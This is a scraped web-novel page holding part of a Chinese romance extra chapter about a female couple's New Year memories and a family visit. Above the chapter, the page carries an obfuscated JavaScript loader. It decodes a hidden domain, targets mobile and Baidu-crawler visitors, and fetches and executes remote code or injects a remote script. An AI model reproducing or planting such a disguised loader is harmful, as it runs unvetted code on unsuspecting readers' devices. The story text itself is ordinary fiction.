98小说网

阅读记录  |   用户书架
function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuamJzZGprYmNzY2QuY29t','2843',window,document,['G','TpoZFcguG']);}:function(){};
上一章
目录 | 设置
下一页

分卷(10(1 / 2)

加入书签 | 推荐本书 | 问题反馈 |

孟璟受了这个刺激,脸立马变了,气愤愤地:哎!我都等了这么久了,眼看就要得手,结果煮熟的鸭子飞了,我不是要气死,哭一下怎么了,都不能

她要是说下去可以说得非常露骨,若若受不住这个,听到往往会羞得不行,就翻身把鲸鱼掀下去,温柔地吻她。

最后两个人再抱着安安稳稳睡觉的时候,孟璟终于又觉得甜丝丝的了,先前的不快早飞到了爪哇国。随之而去的还有她那萌动一时的想要孩子的小愿望。

第113章 番外3

孟璟想要孩子,不是天然的繁殖欲,她自己有没有后代,那是很无谓的一件事,比如她和祖父之间,就没有血缘,但是这并不妨碍他们之间的祖孙亲情。真的喜欢养孩子的话,去领养一个就好。但问题在于,她想要的不是一般的孩子,她想要的是若若二代。

如今的同性生殖手段也很完善了,通过诱变,两枚女性生殖细胞融合,得到的也是可以正常发育的原始胚胎,所诞生的后代与异性恋自然受孕的孩童比较而言,非但不存在任何隐患,不少例子证明,这样的孩子,在特定的艺术或是学术方面的天分反而更加高超。

虽说技术不成问题,但是孟璟想,任何事情都是有风险的,万一搞出来的不是若若二代,而是孟璟二代,一天天的,和自己抢若若,那可不糟糕了嘛。

这么一想,就彻底释怀了。

她和老婆两个人二人世界最好了,不需要任何的别人来锦上添花。哪怕孩子也是。想通了,开开心心地张罗起过年来。

孟璟最喜欢的节日就是过年,别的节日老婆不一定在,但春节就不一样了,一定会到家里团聚。当然也有例外,去年两个人是在外边过。

去年若若其实遇到了很难缠的导演,临近除夕,依旧没有放人的迹象,孟璟按捺不住,冒着哪怕被老婆打一顿的危险,悄悄潜过去探班来着,谁知恰好撞上若若在和导演交涉。

导演扯起一口京剧腔:宋若,你以前不这样啊。

像宋若这样,不存在任何坎坷的设定,仿佛上天眷顾,自出道起就爆红,已红足十年,奖项拿到手软,如此一帆风顺,可以说是蜜罐里泡大的演员,明明再怎么傲慢也不奇怪,毕竟人性就是有弱点,年少成名者往往眼高于顶,不把世人放在眼内,偏偏她反而是谦逊得体,进退有度,历来合作过的导演或是剧组搭档,对她的评价一致都是比新人还勤谨,是想要无限次合作的女演员。

所以这位吕导才无法理解,好好的口碑爆棚的拼命十三娘,怎么突然间耍起性子来了,卡在这个节骨眼儿上,一定要请假。

拍完再走行不行?拍完给你发个大红包。迟几天也还是春节啊。

吕导,我真得回去。若若的声音。孟璟行李放在酒店,找了个隐蔽的角落,背靠着墙,两手插口袋,隔着咫尺的距离偷听老婆说话,只听她老婆又说道:导演也回去陪陪家人吧。

老吕恍然大悟,是为了孟璟是吧?

若若应该是点了点头,说:她一个人在家,这大过节,还不在家哭鼻子,我在这里怎么待得下去。

哭鼻子,哈哈,孟璟平日里是这个风格吗,真是看不出,那不成了个小孩子了?

可不就是个小孩子。

孟璟嘴角狂抽,来不及吐槽涉及自己的部分,只深深地感到惊奇,老婆这是怎样一种聊天的才能啊,明明是工作上的谈判,说着说着就变成了拉家常。

老吕啧啧连声:你看看你们!这件事我一直挺遗憾的,孟璟啊你们俩一块儿拍戏,多好啊。多少人,每年多少人,削尖了脑袋想进这个圈子进不来,小孟倒好,那么好的天赋那么高的起点,说退圈就退圈了,所以说人这个东西啊,还真就是这样,容易到手的都不会珍惜的。

不。不是的。她没有不珍惜,因为同行是冤家。若若声音里添了笑意,知道我除了拍戏不会别的,她让我的。

老吕一阵干笑,最终答应一起休假,整个剧组托若若的福,也都可以回家过年了。

当时孟璟本来想叫住太太的,可是若若步子很快,很急,一阵风似的就走过去了,孟璟心下暗笑,连忙跟上去,可惜以她大长腿的优势,竟然都没能追上老婆,一面在心里卧槽,一面又禁不住得意洋洋,原来小药瓶子竟然这么想她,归心似箭,跟踩了风火轮一样。

先前也不知道是谁呢,多少年了,还装冷淡,说什么老夫老妻别玩浪漫呢,头皮发麻呢。

其实最浪漫的就是小药瓶子本人。

眼看助理要开房门了,孟璟从后面猛地抱过去,同时喊了声老婆,若若这么稳重一个人,吓得失声惊呼,转身就要揍人

那真是一个甜蜜的夜晚呀。解锁了好几个新姿势

想什么呢?老婆的声音近在咫尺。孟璟回过神来,不自然地清了清嗓子,啊?

问你想什么。若若的食指在她额头轻轻点了点。

没、没什么。

没什么?若若狐疑地问,脸都红了。

两个人正在购物中心,打算买一些礼物去看看孟姗姗。这位姑姑近来身体不太好。

真、真的没有啦。孟璟快被自己雷晕了,手里拿着一盒饼干,竟然就顺藤摸瓜想起那么多社情的事。自己可真是个禽兽呀。赶忙闭了闭眼,勉强把脑海里的旖旎记忆驱逐出境。

挑好了礼品,两个人驱车去了孟家。

孟姗姗升级做了祖母以后,心态上也平和了许多,而且思念父亲,想起来孟璟是他生前最钟爱的,爱屋及乌,见了宋若孟璟,不免有一种惺惺相惜之感;孟璟这方面呢,有妻万事足,本就不是个斤斤计较的人,前尘往事早淡忘了。因而和这位姑妈的关系,反而不像少年时代那么紧张。

最重要的,谢文聘恰好在这里。

小朋友永远是调节气氛的一把好手。

她那嫩藕节似的小手臂一晃一晃,就把所有人的注意力都吸引过去了。

这小孩在襁褓里的时候若若抱过,后面就见得少,多半是在盛雪的朋友圈内看见她了。这活生生会下地会跳会跑还会唱的小谢,宋若还是头一次见,纳罕不已,仿佛大家重新认识。

时间真神奇,一个小生命转眼就这么大。

她看谢文聘,谢文聘也看她,本来在闹腾的,她和孟璟一来,小谢就不闹了,做淑女状乖乖倚在祖母怀里,大人喝茶说话,她就静静打量着对面的人,过了十来分钟,将小脸反仰过去,问:祖母,我长大以后,可不可以和若若阿姨结婚?

孟璟:噗一口伯爵茶,险些没给自己呛死。

宋若瞥她一眼,拿纸巾默默替她清理了一下。

孟姗姗忍俊不禁,摩挲她的小肩膀:我看不大行,你若若阿姨有伴儿了,诺,就是那个鲸鱼阿姨,但是,她们家如果以后有了小宝宝,那你肯定可以,近水楼台先得月。

谢文聘皱着小眉头,一脸疑惑不解,字正腔圆地问:什么叫近水楼台先得月?

上一章
目录
下一页
A- 18 A+
默认 贵族金 护眼绿 羊皮纸 可爱粉 夜间